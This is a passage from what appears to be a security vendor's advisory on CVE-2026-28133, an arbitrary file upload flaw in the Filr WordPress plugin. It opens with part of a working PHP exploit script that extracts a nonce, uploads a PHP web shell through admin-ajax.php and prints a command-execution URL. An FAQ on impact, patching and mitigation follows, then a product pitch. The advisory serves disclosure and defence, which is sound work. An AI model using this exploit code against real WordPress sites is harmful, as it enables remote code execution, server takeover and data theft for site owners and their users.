preg_match('/"filr_nonce":"([a-f0-9]+)"/', $response, $matches);
$nonce = $matches[1] ?? '';
if (empty($nonce)) {
die('Failed to extract nonce');
}
// Step 3: Upload malicious PHP file via AJAX
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$cfile = new CURLFile($malicious_file, 'application/x-php', 'shell.php');
$post_data = [
'action' => 'filr_upload_file',
'filr_nonce' => $nonce,
'filr_file' => $cfile,
'filr_dir' => '' // Root upload directory
];
// Create temporary file with malicious content
file_put_contents($malicious_file, $file_content);
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: multipart/form-data']);
$response = curl_exec($ch);
curl_close($ch);
// Clean up temporary file
unlink($malicious_file);
// Step 4: Parse response and locate uploaded file
$json = json_decode($response, true);
if (isset($json['success']) && $json['success'] === true) {
$uploaded_url = $json['data']['url'] ?? '';
echo "Exploit successful! File uploaded to: " . $uploaded_url . "n";
echo "Execute commands via: " . $uploaded_url . "?cmd=whoamin";
} else {
echo "Exploit failed. Response: " . $response . "n";
}
?>Frequently Asked Questions
What is CVE-2026-28133?
Overview of the vulnerabilityCVE-2026-28133 is a high-severity vulnerability in the Filr – Secure document library plugin for WordPress, affecting versions up to 1.2.13. It allows authenticated users with Contributor-level access and above to upload arbitrary files, which may lead to remote code execution.
How does this vulnerability work?
Mechanism of exploitationThe vulnerability arises from missing file type validation in the plugin’s file upload functionality. Authenticated users can exploit this by uploading files without restrictions, which could include malicious scripts that execute on the server.
Who is affected by this vulnerability?
Identifying at-risk usersAny WordPress site using the Filr plugin version 1.2.13 or earlier is at risk. Specifically, users with Contributor-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verificationTo check if your site is vulnerable, verify the version of the Filr plugin installed. If it is version 1.2.13 or earlier, your site is susceptible to this vulnerability.
How can I fix this vulnerability?
Recommended actionsTo mitigate this vulnerability, upgrade the Filr plugin to version 1.2.14 or later, which includes a patch that implements file type validation for uploads.
What does a CVSS score of 8.8 indicate?
Understanding risk levelsA CVSS score of 8.8 indicates a high level of severity, meaning that the vulnerability poses a significant risk to affected systems. It suggests that exploitation could lead to severe consequences, such as full server compromise.
What is the proof of concept for this vulnerability?
Demonstration of exploitationThe proof of concept demonstrates how an authenticated user can exploit the vulnerability by logging into a WordPress site and uploading a malicious PHP file. This file could allow the attacker to execute arbitrary commands on the server.
What types of files can be uploaded due to this vulnerability?
Potential risks of file uploadsAttackers can upload any type of file, including PHP scripts, which can be executed on the server. This could lead to unauthorized access, data breaches, or complete control over the affected server.
What are the implications of a successful attack?
Consequences of exploitationIf exploited, this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary commands on the server. This can result in data theft, service disruption, or further attacks on the network.
Is there a way to mitigate the risk if I cannot update immediately?
Temporary measuresIf immediate updating is not possible, consider restricting access to the upload functionality for Contributor-level users and above, or implementing a web application firewall to block malicious uploads.
How can I stay informed about vulnerabilities like this?
Keeping updated on securityTo stay informed about vulnerabilities, subscribe to security mailing lists, follow relevant security blogs, and regularly check the National Vulnerability Database (NVD) or CVE databases for updates.
What should I do if I suspect my site has been compromised?
Steps to take after a breachIf you suspect a compromise, immediately take your site offline, conduct a thorough security audit, remove any malicious files, and restore from a clean backup. Additionally, change all passwords and review user permissions.
How Atomic Edge Works
Simple Setup. Powerful Security.
Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.
Trusted by Developers & Organizations
